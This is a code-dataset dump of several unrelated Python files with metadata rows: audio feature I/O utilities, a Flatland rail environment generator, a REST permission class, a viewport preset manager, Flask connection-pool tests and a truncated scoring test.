| 31.017857 | 77 | 0.65688 | 213 | 1,737 | 5.220657 | 0.497653 | 0.024281 | 0.026978 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004087 | 0.154865 | 1,737 | 55 | 78 | 31.581818 | 0.753406 | 0.408751 | 0 | 0 | 0 | 0 | 0.129703 | 0.031683 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.464286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cd738342d6d3e6c1d28d3273ebe5ae8755466f | 8,015 | py | Python | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | core_scripts/data_io/io_tools.py | tyanz/project-NN-Pytorch-scripts | 7e90df0f90b04088613d6efb667e147a366273fb | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
io_tools
Functions to load data
"""
from __future__ import absolute_import
import os
import sys
import json
import numpy as np
__author__ = "Xin Wang"
__email__ = "wangxin@nii.ac.jp"
__copyright__ = "Copyright 2020, Xin Wang"
def f_read_raw_mat(filename, col, data_format='f4', end='l'):
    """read_raw_mat(filename,col,data_format='float',end='l')
    Read a raw binary matrix from filename.

    filename: path to the binary file
    col: number of columns of the data
    data_format: numpy type code of one element
                 default: 'f4', float32
    end: little endian 'l' or big endian 'b'?
         default: 'l' (anything else means native order)

    Returns a (N, col) np.array; a (N, 1) result is squeezed to (N,).

    Note: interpreting each value with struct.unpack('f', ...) would also
    work but is slow; np.fromfile converts in one pass.
    """
    if end == 'l':
        data_format = '<' + data_format
    elif end == 'b':
        data_format = '>' + data_format
    else:
        data_format = '=' + data_format
    datatype = np.dtype((data_format, (col,)))
    # 'with' closes the handle even if np.fromfile raises (the original
    # open/close pair leaked it on error).
    with open(filename, 'rb') as f:
        data = np.fromfile(f, dtype=datatype)
    if data.ndim == 2 and data.shape[1] == 1:
        return data[:, 0]
    else:
        return data
def f_read_raw_mat_length(filename, data_format='f4'):
    """f_read_raw_mat_length(filename, data_format='f4')
    Return the number of stored elements (for 'f4') or the byte count.

    filename: path to the binary file
    data_format: 'f4' divides the byte count by 4 (float32 elements);
                 any other value returns the raw byte count

    (The original opened the file and seek/tell'd to the end just to get
    its size; os.path.getsize gives the same number without a handle.)
    """
    bytes_num = os.path.getsize(filename)
    if data_format == 'f4':
        return int(bytes_num / 4)
    else:
        return bytes_num
def f_read_htk(filename, data_format='f4', end='l'):
    """read_htk(filename, data_format='f4', end='l')
    Read an HTK feature file and return the data as numpy.array.

    filename: input file name
    data_format: element type; must be a float format (default 'f4')
    end: little endian 'l' or big endian 'b'?
         default: 'l' (anything else means native order)

    Returns a (nSamples, sample_size) np.array, or False when data_format
    is not a float type.
    """
    if end == 'l':
        data_format = '<' + data_format
        data_formatInt4 = '<i4'
        data_formatInt2 = '<i2'
    elif end == 'b':
        data_format = '>' + data_format
        data_formatInt4 = '>i4'
        data_formatInt2 = '>i2'
    else:
        data_format = '=' + data_format
        data_formatInt4 = '=i4'
        data_formatInt2 = '=i2'

    # 12-byte HTK header: sample count, sample period, bytes/sample, kind.
    head_type = np.dtype([('nSample', data_formatInt4), ('Period', data_formatInt4),
                          ('SampleSize', data_formatInt2), ('kind', data_formatInt2)])
    # 'with' fixes the original's leak: its early `return False` path never
    # closed the file. (A dead triple-quoted string duplicating the
    # endianness logic was also removed.)
    with open(filename, 'rb') as f:
        head_info = np.fromfile(f, dtype=head_type, count=1)
        if 'f' in data_format:
            # SampleSize is in bytes; float32 elements are 4 bytes each.
            sample_size = int(head_info['SampleSize'][0] / 4)
        else:
            print("Error in read_htk: input should be float32")
            return False
        datatype = np.dtype((data_format, (sample_size,)))
        data = np.fromfile(f, dtype=datatype)
    return data
def f_read_htk_length(filename, data_format='f4', end='l'):
    """read_htk_length(filename, data_format='f4', end='l')
    Return the per-frame vector size of an HTK feature file
    (SampleSize header field / 4, i.e. the float32 element count).

    filename: input file name
    data_format: accepted for symmetry with f_read_htk; it does not
                 influence the result
    end: little endian 'l' or big endian 'b'?
         default: 'l' (anything else means native order)
    """
    # Only the integer header formats matter here; the original also built
    # a '<'/'>'-prefixed data_format that was never used (dead code).
    if end == 'l':
        data_formatInt4 = '<i4'
        data_formatInt2 = '<i2'
    elif end == 'b':
        data_formatInt4 = '>i4'
        data_formatInt2 = '>i2'
    else:
        data_formatInt4 = '=i4'
        data_formatInt2 = '=i2'

    head_type = np.dtype([('nSample', data_formatInt4), ('Period', data_formatInt4),
                          ('SampleSize', data_formatInt2), ('kind', data_formatInt2)])
    with open(filename, 'rb') as f:
        head_info = np.fromfile(f, dtype=head_type, count=1)

    sample_size = int(head_info['SampleSize'][0] / 4)
    return sample_size
def f_write_raw_mat(data, filename, data_format='f4', end='l'):
    """write_raw_mat(data, filename, data_format='f4', end='l')
    Write a numpy array to filename as raw binary. Returns True on
    success, False when data is not an np.ndarray.

    data: np.array
    filename: output path
    data_format: numpy type code for the stored elements
                 default: 'f4', float32; an empty string writes the
                 array's own dtype unconverted
    end: little endian 'l' or big endian 'b'?
         default: 'l'; only effective when data_format is non-empty

    Note: writing element-by-element with two for loops would also work
    but is too slow; ndarray.tofile does it in one pass.
    """
    if not isinstance(data, np.ndarray):
        print("Error write_raw_mat: input should be np.array")
        return False
    if len(data_format) > 0:
        if end == 'l':
            data_format = '<' + data_format
        elif end == 'b':
            data_format = '>' + data_format
        else:
            data_format = '=' + data_format
        temp_data = data.astype(np.dtype(data_format))
    else:
        temp_data = data
    # 'with' closes the handle even if astype/tofile raises.
    with open(filename, 'wb') as f:
        temp_data.tofile(f, '')
    return True
def f_write_htk(data, targetfile, sampPeriod=50000, sampKind=9, data_format='f4', end='l'):
    """
    write_htk(data, targetfile,
              sampPeriod=50000, sampKind=9, data_format='f4', end='l')

    Write a numpy array as an HTK feature file. Header layout matches
    f_read_htk: nSamples (i4), sampPeriod (i4), sampSize in bytes (i2),
    sampKind (i2), followed by the sample data. Returns True.

    data: (nSamples, vDim) or (nSamples,) np.array
    targetfile: output path
    sampPeriod: HTK sample period field (default 50000)
    sampKind: HTK parameter-kind field (default 9)
    data_format: element type code; 'f4' => 4 bytes/element, else 8
    end: little endian 'l' or big endian 'b'? default 'l'
    """
    if data.ndim == 1:
        nSamples, vDim = data.shape[0], 1
    else:
        nSamples, vDim = data.shape
    if data_format == 'f4':
        sampSize = vDim * 4
    else:
        sampSize = vDim * 8

    if end == 'l':
        data_format1 = '<i4'
        data_format2 = '<i2'
        data_format = '<' + data_format
    elif end == 'b':
        data_format1 = '>i4'
        data_format2 = '>i2'
        data_format = '>' + data_format
    else:
        data_format1 = '=i4'
        data_format2 = '=i2'
        data_format = '=' + data_format

    with open(targetfile, 'wb') as f:
        # BUG FIX: the original wrote [nSamples, sampPeriod] with
        # np.dtype(data_format) -- the *float* data format -- instead of the
        # i4 header format, which corrupted the header for any reader
        # (including f_read_htk).
        np.array([nSamples, sampPeriod], dtype=np.dtype(data_format1)).tofile(f, '')
        np.array([sampSize, sampKind], dtype=np.dtype(data_format2)).tofile(f, '')
        data.astype(np.dtype(data_format)).tofile(f, '')
    return True
def read_dic(file_path):
    """ dic = read_dic(file_path)
    Read a json file from file_path and return a dictionary.

    Args:
      file_path: string, path to the file

    Returns:
      dic: a dictionary

    Exits the process (status 1) when the file is missing or is not
    valid JSON.
    """
    try:
        # 'with' fixes the original's json.load(open(...)) handle leak.
        with open(file_path) as fh:
            data = json.load(fh)
    except IOError:
        print("Cannot find %s" % (file_path))
        sys.exit(1)
    except json.decoder.JSONDecodeError:
        print("Cannot parse %s" % (file_path))
        sys.exit(1)
    return data
def write_dic(dic, file_path):
    """ write_dic(dic, file_path)
    Write a dictionary to file as JSON.

    Args:
      dic: dictionary to be dumped
      file_path: file to store the dictionary

    Exits the process (status 1) when the file cannot be written.
    """
    try:
        # 'with' fixes the original's json.dump(dic, open(...)) handle
        # leak, which also relied on GC to flush the write buffer.
        with open(file_path, 'w') as fh:
            json.dump(dic, fh)
    except IOError:
        print("Cannot write to %s " % (file_path))
        sys.exit(1)
def file_exist(file_path):
    """ file_exist(file_path)
    Return True when file_path is an existing regular file or a symlink.
    """
    is_regular_file = os.path.isfile(file_path)
    is_symlink = os.path.islink(file_path)
    return is_regular_file or is_symlink
| 29.251825 | 86 | 0.572302 | 1,044 | 8,015 | 4.211686 | 0.177203 | 0.152377 | 0.076416 | 0.081874 | 0.622697 | 0.605413 | 0.538776 | 0.509666 | 0.46327 | 0.443712 | 0 | 0.019724 | 0.30418 | 8,015 | 273 | 87 | 29.358974 | 0.768693 | 0.283843 | 0 | 0.655844 | 0 | 0 | 0.073123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058442 | false | 0 | 0.032468 | 0 | 0.168831 | 0.032468 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cf36edc22c7f7e4d4a27e2cc587f5fe4069278 | 3,000 | py | Python | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | 4 | 2021-01-15T10:49:33.000Z | 2021-12-31T08:11:35.000Z | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | null | null | null | envs/flatland/utils/env_generators.py | BkyuChoi/HpicFlatland | bdbba7ce451eb72dc760993b96cec4772a08983c | [
"MIT"
] | null | null | null | import logging
import random
from typing import NamedTuple
from flatland.envs.malfunction_generators import malfunction_from_params
# from flatland.envs.rail_env import RailEnv
from envs.flatland.utils.gym_env_wrappers import FlatlandRenderWrapper as RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
MalfunctionParameters = NamedTuple('MalfunctionParameters', [('malfunction_rate', float), ('min_duration', int), ('max_duration', int)])


def random_sparse_env_small(random_seed, max_width, max_height, observation_builder):
    """Build a small random sparse Flatland RailEnv.

    Grid size, city/train counts and malfunction parameters are drawn from
    *random_seed*. When generation raises ValueError the grid grows by 5 in
    each dimension and generation is retried; once it would exceed
    (max_width, max_height), None is returned.
    """
    random.seed(random_seed)
    size = random.randint(0, 5)
    width = 20 + size * 5
    height = 20 + size * 5
    nr_cities = 2 + size // 2 + random.randint(0, 2)
    nr_trains = min(nr_cities * 5, 5 + random.randint(0, 5))  # , 10 + random.randint(0, 10))
    max_rails_between_cities = 2
    max_rails_in_cities = 3 + random.randint(0, size)
    malfunction_rate = 30 + random.randint(0, 100)
    malfunction_min_duration = 3 + random.randint(0, 7)
    malfunction_max_duration = 20 + random.randint(0, 80)

    rail_generator = sparse_rail_generator(max_num_cities=nr_cities, seed=random_seed, grid_mode=False,
                                           max_rails_between_cities=max_rails_between_cities,
                                           max_rails_in_city=max_rails_in_cities)

    # new version:
    # stochastic_data = MalfunctionParameters(malfunction_rate, malfunction_min_duration, malfunction_max_duration)
    stochastic_data = {'malfunction_rate': malfunction_rate, 'min_duration': malfunction_min_duration,
                       'max_duration': malfunction_max_duration}

    schedule_generator = sparse_schedule_generator({1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. / 4.: 0.25})

    while width <= max_width and height <= max_height:
        try:
            env = RailEnv(width=width, height=height, rail_generator=rail_generator,
                          schedule_generator=schedule_generator, number_of_agents=nr_trains,
                          malfunction_generator_and_process_data=malfunction_from_params(stochastic_data),
                          obs_builder_object=observation_builder, remove_agents_at_target=False)
            print("[{}] {}x{} {} cities {} trains, max {} rails between cities, max {} rails in cities. Malfunction rate {}, {} to {} steps.".format(
                random_seed, width, height, nr_cities, nr_trains, max_rails_between_cities,
                max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration
            ))
            return env
        except ValueError as e:
            logging.error(f"Error: {e}")
            width += 5
            height += 5
            # BUG FIX: the original passed width/height as extra positional
            # arguments with no %-placeholders in the message, so logging
            # could not format them (the values were never shown).
            logging.info("Try again with larger env: (w,h): %s %s", width, height)
    # BUG FIX: the original interpolated max_height for max_width here.
    logging.error(f"Unable to generate env with seed={random_seed}, max_width={max_width}, max_height={max_height}")
    return None
| 50.847458 | 149 | 0.687 | 374 | 3,000 | 5.200535 | 0.262032 | 0.041131 | 0.057584 | 0.053985 | 0.167095 | 0.167095 | 0.128535 | 0.112596 | 0.05964 | 0.05964 | 0 | 0.025214 | 0.22 | 3,000 | 58 | 150 | 51.724138 | 0.805983 | 0.065 | 0 | 0 | 0 | 0.022727 | 0.128571 | 0.023929 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.159091 | 0 | 0.227273 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5cfab6e94dd6a1313e2d99802b5e11a6af2b20d | 616 | py | Python | api/permissions.py | andela-jmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | 2 | 2017-10-07T09:26:46.000Z | 2019-01-20T01:34:13.000Z | api/permissions.py | mrmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | null | null | null | api/permissions.py | mrmuli/wishlist | 39650f7545606aedfe0b32f39bcc883d9b38985c | [
"MIT"
] | null | null | null | from rest_framework import permissions
from models import Bucketlist
class IsOwnerOrReadOnly(permissions.BasePermission):
    """
    Object-level permission to only allow owners of an object to edit it.
    """

    def has_object_permission(self, request, view, obj):
        """
        Read permissions are allowed to any request,
        so we'll always allow GET, HEAD or OPTIONS requests.
        """
        if request.method in permissions.SAFE_METHODS:
            return True
        if isinstance(obj, Bucketlist):
            # Write access only for the user who created the bucketlist.
            return obj.created_by == request.user
        else:
            # NOTE(review): returning the object itself grants write access
            # whenever obj is truthy, i.e. effectively always for
            # non-Bucketlist objects. Presumably an ownership check (or a
            # plain False) was intended here -- confirm the intended
            # behavior before relying on this branch.
            return obj
| 29.333333 | 73 | 0.652597 | 73 | 616 | 5.438356 | 0.712329 | 0.04534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.282468 | 616 | 20 | 74 | 30.8 | 0.89819 | 0.271104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d01d592715818cd44140b5a297b191c7be3b94 | 1,438 | py | Python | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | 19 | 2016-02-26T18:43:31.000Z | 2021-04-10T18:29:29.000Z | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | null | null | null | mvp/presets.py | danbradham/mvp | 7471af9964ff789897792b23d59c597055d566f5 | [
"MIT"
] | 8 | 2015-12-14T15:10:09.000Z | 2021-06-12T04:20:36.000Z | # -*- coding: utf-8 -*-
import json
import glob
import os
from . import config
def get_presets():
    '''Get a generator yielding preset name, data pairs'''
    for search_dir in config.PRESETS_PATH:
        pattern = os.path.join(search_dir, '*.json')
        for preset_file in glob.glob(pattern):
            # The preset name is the file name minus its .json extension.
            preset_name = os.path.splitext(os.path.basename(preset_file))[0]
            with open(preset_file, 'r') as handle:
                preset_data = json.loads(handle.read())
            yield preset_name, preset_data
def get_preset(name):
    '''Get a preset by name'''
    for preset_name, state in get_presets():
        if preset_name == name:
            return state
def find_preset(name):
    '''Find the path to a given preset...

    :param name: Preset name (without the .json extension)
    :raises ValueError: when no preset of that name exists on any
        configured presets path
    '''
    for path in config.PRESETS_PATH:
        prospect = os.path.join(path, name + '.json')
        if os.path.isfile(prospect):
            return prospect
    # BUG FIX: the original passed name as a second ValueError argument, so
    # '%s' was never interpolated into the message.
    raise ValueError('Could not find a preset named %s' % name)
def new_preset(name, data):
    '''Create a new preset from viewport state data

    :param name: Name of the preset
    :param data: Viewport state dict

    usage::

        import mvp
        active = mvp.Viewport.active()
        mvp.new_preset('NewPreset1', active.get_state())
    '''
    # New presets are always written to the first configured presets path.
    target_path = os.path.join(config.PRESETS_PATH[0], name + '.json')
    with open(target_path, 'w') as handle:
        handle.write(json.dumps(data))
def del_preset(name):
    '''Delete the preset with the given name, if its file exists.'''
    path_to_remove = find_preset(name)
    if os.path.exists(path_to_remove):
        os.remove(path_to_remove)
| 21.787879 | 70 | 0.596662 | 205 | 1,438 | 4.102439 | 0.331707 | 0.049941 | 0.060642 | 0.035672 | 0.061831 | 0.061831 | 0 | 0 | 0 | 0 | 0 | 0.00385 | 0.277469 | 1,438 | 65 | 71 | 22.123077 | 0.805582 | 0.244089 | 0 | 0.066667 | 0 | 0 | 0.048216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.133333 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d100195ec1f56bb39011ceafce3d09ae2b3187 | 9,539 | py | Python | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 1 | 2019-06-13T21:18:10.000Z | 2019-06-13T21:18:10.000Z | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 11 | 2018-01-16T19:12:12.000Z | 2020-05-11T12:05:56.000Z | tests/test_flask_cuttlepool.py | smitchell556/flask-cuttlepool | 32112c41947197d255646e408ede8f6b86ffb21c | [
"BSD-3-Clause"
] | 1 | 2018-01-17T05:36:43.000Z | 2018-01-17T05:36:43.000Z | # -*- coding: utf-8 -*-
"""Tests for Flask-CuttlePool."""
import pytest
from flask import Flask
# Find the stack on which we want to store the database connection.
# Starting with Flask 0.9, the _app_ctx_stack is the correct one,
# before that we need to use the _request_ctx_stack.
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
import mocksql
from flask_cuttlepool import (_CAPACITY, _OVERFLOW, _TIMEOUT, CuttlePool,
FlaskCuttlePool, PoolConnection)
# Credential fixtures for the first mock database.
@pytest.fixture
def user():
    return 'paul_hollywood'


@pytest.fixture
def password():
    return 'bread_is_the_best'


@pytest.fixture
def host():
    return 'an_ip_address_in_england'


# Credentials for a second, distinct mock database (multi-app tests).
@pytest.fixture
def user2():
    return 'marry_berry'


@pytest.fixture
def password2():
    return 'cake_and_margaritas'


@pytest.fixture
def host2():
    return 'another_ip_address_in_england'
def create_app(u, p, h):
    """Build a testing Flask app configured with CuttlePool credentials."""
    app = Flask(__name__)
    app.testing = True
    app.config.update(
        CUTTLEPOOL_USER=u,
        CUTTLEPOOL_PASSWORD=p,
        CUTTLEPOOL_HOST=h
    )
    return app


@pytest.fixture
def app(user, password, host):
    """A Flask ``app`` instance."""
    return create_app(user, password, host)


@pytest.fixture
def app2(user2, password2, host2):
    """A second Flask ``app`` instance with distinct credentials."""
    return create_app(user2, password2, host2)
def add_decorators(p):
    """Adds ping and normalize decorators to pool."""
    # Trivial test doubles for the two callbacks a pool needs.
    @p.ping
    def ping(con):
        return True

    @p.normalize_connection
    def normalize(con):
        pass


@pytest.fixture
def pool_no_app():
    """Pool with no app."""
    p = FlaskCuttlePool(mocksql.connect)
    add_decorators(p)
    return p


# Parametrized so every test runs against both initialization styles.
@pytest.fixture(params=[1, 2])
def pool_one(request, app):
    """Pool initialized with one app."""
    if request.param == 1:
        # Pool initialized with app in __init__() only.
        pool = FlaskCuttlePool(mocksql.connect, app=app)
    elif request.param == 2:
        # Pool initialized with app in init_app() only.
        pool = FlaskCuttlePool(mocksql.connect)
        pool.init_app(app)
    add_decorators(pool)
    return pool


@pytest.fixture(params=[1, 2])
def pool_two(request, app, app2):
    """Pool initialized with two apps."""
    if request.param == 1:
        # Pool initialized with one app in __init__() and one app in
        # init_app().
        pool = FlaskCuttlePool(mocksql.connect, app=app)
        pool.init_app(app2)
    elif request.param == 2:
        # Pool initialized with two apps in init_app() only.
        pool = FlaskCuttlePool(mocksql.connect)
        pool.init_app(app)
        pool.init_app(app2)
    add_decorators(pool)
    return pool
def test_init_no_app(user, password, host):
    """Test FlaskCuttlePool instantiates properly without an app object."""
    pool = FlaskCuttlePool(mocksql.connect, user=user, password=password, host=host)
    add_decorators(pool)

    assert isinstance(pool, FlaskCuttlePool)
    # Sizing kwargs fall back to the package defaults.
    assert pool._cuttlepool_kwargs['capacity'] == _CAPACITY
    assert pool._cuttlepool_kwargs['overflow'] == _OVERFLOW
    assert pool._cuttlepool_kwargs['timeout'] == _TIMEOUT
    # Connection kwargs come from the constructor arguments.
    assert pool._cuttlepool_kwargs['user'] == user
    assert pool._cuttlepool_kwargs['password'] == password
    assert pool._cuttlepool_kwargs['host'] == host


def test_init_with_app(app, pool_one, user, password, host):
    """Test FlaskCuttlePool instantiates properly with an app object."""
    assert isinstance(pool_one, FlaskCuttlePool)
    assert pool_one._cuttlepool_kwargs['capacity'] == _CAPACITY
    assert pool_one._cuttlepool_kwargs['overflow'] == _OVERFLOW
    assert pool_one._cuttlepool_kwargs['timeout'] == _TIMEOUT


def test_init_two_pools_one_app(app):
    """Test two pools can be used with one app object."""
    pool1 = FlaskCuttlePool(mocksql.connect, app=app)
    add_decorators(pool1)
    pool2 = FlaskCuttlePool(mocksql.connect, app=app)
    add_decorators(pool2)

    # Each extension instance keeps its own underlying CuttlePool.
    assert pool1.get_pool() is not pool2.get_pool()


def test_get_app_no_init(app):
    """
    Tests the ``app`` is returned when ``app`` is only passed to pool
    ``__init__()``.
    """
    pool = FlaskCuttlePool(mocksql.connect, app=app)
    add_decorators(pool)
    # Test in app context.
    with app.app_context():
        assert pool._get_app() is app
    # Test outside app context.
    assert pool._get_app() is app


def test_get_app_multiple(pool_two, app, app2):
    """Tests the correct ``app`` is returned."""
    with app.app_context():
        assert pool_two._get_app() is app

    with app2.app_context():
        assert pool_two._get_app() is app2


def test_get_app_no_app():
    """Tests an error is raised when there is no app."""
    pool = FlaskCuttlePool(mocksql.connect)
    add_decorators(pool)
    with pytest.raises(RuntimeError):
        pool._get_app()


def test_get_pool(pool_two, app, app2):
    """Tests the proper pool is retreived."""
    with app.app_context():
        pool = pool_two.get_pool()

    # Ensure same pool is returned again.
    with app.app_context():
        assert pool is pool_two.get_pool()

    # Ensure different pool for different app.
    with app2.app_context():
        assert pool is not pool_two.get_pool()


def test_get_pool_different_apps_and_pools(app, app2):
    """
    Tests that connection pools are stored correctly for each pool, app pair.
    """
    pool1 = FlaskCuttlePool(mocksql.connect, app=app)
    add_decorators(pool1)
    # Create another pool with a different app. The call to get_pool() by
    # pool1 should attempt to retrieve the pool set by pool2 and fail.
    pool2 = FlaskCuttlePool(mocksql.connect, app=app2)
    add_decorators(pool2)

    with app2.app_context():
        with pytest.raises(RuntimeError):
            pool1.get_pool()
def test_make_pool(app, user, password, host):
"""Tests _make_pool method."""
pool = FlaskCuttlePool(mocksql.connect)
add_decorators(pool)
p = pool._make_pool(app)
assert isinstance(p, CuttlePool)
con_args = p.connection_arguments
assert con_args['user'] == user
assert con_args['password'] == password
assert con_args['host'] == host
def test_get_connection(app, pool_one):
"""Test get_connection returns a connection."""
with app.app_context():
con = pool_one.get_connection()
assert isinstance(con, PoolConnection)
def test_connection_app_ctx(app, pool_one):
"""Tests the same connection is retrieved from the stack."""
with app.app_context():
con1 = pool_one.connection
assert hasattr(stack.top, 'cuttlepool_connection')
con2 = pool_one.connection
assert con1 is con2
assert pool_one.connection is None
def test_connection_after_close(app, pool_one):
"""Ensure connection property properly handles closed connections."""
with app.app_context():
con = pool_one.connection
con.close()
assert con is not pool_one.connection
assert pool_one.connection.open
def test_connection_multiple_app_ctx(app, pool_one):
"""
Tests connection property saves a different connection to coexisting app
contexts.
"""
with app.app_context():
con1 = pool_one.connection
with app.app_context():
con2 = pool_one.connection
assert con1 is not con2
assert con1 is pool_one.connection
def test_commit(app, pool_one):
"""Tests the commit convenience method."""
with app.app_context():
commit1 = pool_one.connection.commit()
commit2 = pool_one.commit()
assert commit1 is not commit2
assert commit1 == commit2
def test_commit_error(app, pool_one):
"""
Tests a RuntimeError is raised when there's no connection on the
application context.
"""
with pytest.raises(RuntimeError):
# Should raise error since there's no application context.
pool_one.commit()
with app.app_context():
with pytest.raises(RuntimeError):
# Should raise error since there's no connection on the application
# context.
pool_one.commit()
def test_cursor(app, pool_one):
"""Tests a cursor is returned."""
with app.app_context():
cur = pool_one.cursor()
assert isinstance(cur, mocksql.MockCursor)
def test_cursor_accepts_arguments(app, pool_one):
"""Tests a cursor can accept arguments."""
class SuperMockCursor(mocksql.MockCursor):
pass
with app.app_context():
cur = pool_one.cursor(cursorclass=SuperMockCursor)
assert isinstance(cur, SuperMockCursor)
def test_ping_decorator(app, pool_one):
"""Tests the ping decorator is used by the connection pool."""
ping_str = "Decorated ping"
@pool_one.ping
def ping(connection):
return ping_str
with app.app_context():
pool = pool_one.get_pool()
assert pool.ping(None) is ping_str
def test_normalize_connection_decorator(app, pool_one):
    """Verify the normalize_connection decorator registers the callback on
    the connection pool."""

    @pool_one.normalize_connection
    def normalize_connection(connection):
        connection.append(1)

    fake_connection = []
    with app.app_context():
        pool_one.get_pool().normalize_connection(fake_connection)
        # If the pool invoked our callback, it appended exactly one 1.
        assert fake_connection == [1]
| 27.891813 | 84 | 0.679945 | 1,249 | 9,539 | 4.98799 | 0.156926 | 0.040449 | 0.025682 | 0.040931 | 0.424077 | 0.347673 | 0.250883 | 0.123114 | 0.069663 | 0.039807 | 0 | 0.008622 | 0.221826 | 9,539 | 341 | 85 | 27.973607 | 0.830661 | 0.228745 | 0 | 0.371859 | 0 | 0 | 0.03177 | 0.010357 | 0 | 0 | 0 | 0 | 0.18593 | 1 | 0.180905 | false | 0.075377 | 0.035176 | 0.040201 | 0.291457 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d3badd80eff4da8c9ac59f2ae9e00ec9a2daf0 | 6,516 | py | Python | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/tests/test_scoringHelpers.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from typing import List, Dict
from ..utils.scoringHelpers import *
def listToResult(l: List[int]) -> List[Dict[str, int]]:
    """Wrap each raw position value in a single-key result dict."""
    results: List[Dict[str, int]] = []
    for position in l:
        results.append({"position": position})
    return results
class Test_countOccurancesOfPosition:
    """Tests for occuracesOfPosition (count results at a given position)."""

    def test_noData(self) -> None:
        # An empty result list contains no position at all.
        for position in (False, -5, 1, 55):
            assert occuracesOfPosition([], position) == 0

    def test_noOccurances(self) -> None:
        for positions in ([5, 4, 3, 2], [55, 66], [8, 9, 3, 7, 3]):
            assert occuracesOfPosition(listToResult(positions), 1) == 0

    def test_occursInList(self) -> None:
        cases = [
            ([5, 4, 3, 2, 1], 1, 1),
            ([1, 2, 3, 5, 1], 1, 2),
            ([1, 1, 2, 1, 2], 1, 3),
            ([5, 4, 3, 2, 1], 2, 1),
            ([1, 2, 3, 5, 1], 2, 1),
            ([1, 1, 2, 1, 2], 2, 2),
            ([5, 4, 3, 2, 10], 10, 1),
            ([10, 2, 3, 10], 10, 2),
            ([10, 10, 10, 2], 10, 3),
        ]
        for positions, query, expected in cases:
            assert occuracesOfPosition(listToResult(positions), query) == expected
class Test_calculateCourseStatistics:
